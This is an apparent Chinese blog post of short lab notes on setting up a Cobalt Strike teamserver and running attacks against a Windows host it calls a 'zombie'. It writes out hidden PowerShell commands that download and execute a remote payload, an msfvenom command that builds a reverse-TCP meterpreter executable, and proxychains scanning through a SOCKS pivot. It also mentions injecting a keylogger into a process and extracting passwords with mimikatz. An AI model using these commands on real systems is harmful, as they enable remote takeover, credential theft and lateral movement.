cobaltstrike基本使用

server安装(Ubuntu18.04) 

服务器: 192.168.1.173     test/magic123

1准备java环境

apt install default-jre

apt install openjdk-11-jre-headless

2.启动服务

chmod 755 teamserver

./teamserver IP Passwd

3.启动客户端

环境  windows7   192.168.1.154   Song/123456

3.1准备好java环境

管理员权限运行.bat,输入serverIP和密码(用户名自定义)

 

 A攻击测试:powershell无文件攻击

1.制作无文件后门(此处是powershell无文件后门)

 

或者

 

 制作一句话执行后门,比如

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.173:82/'))"

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.173:80/atest'))"

2.去肉鸡上cmd执行这句powershell,和cobaltstrike建立连接,进行提权操作

 

3.列出进程列表,选择一个进程注入,执行keylogger

 

4.利用cs上的minikatz进行密码获取

 

B攻击测试:exe集成后门

制作后门msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.25  LPORT=4444 -f exe > shell.exe

kali攻击端

 

提权后(进入meterpreter)

执行shell

执行systeminfo

C.artifact.exe敏感文件后门测试

直接生成后门,上传到肉鸡上

D.socket网络代理后门测试

1.在cobaltstrike已有的beacon上建立socket代理

 

2.在攻击机上(kali)配置socket4(或者socket5)的IP和端口

vim /etc/proxychains.conf

3.在攻击机器上进行肉鸡所在网段的扫描

proxychains nmap -sP 192.168.1.0/24

 

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值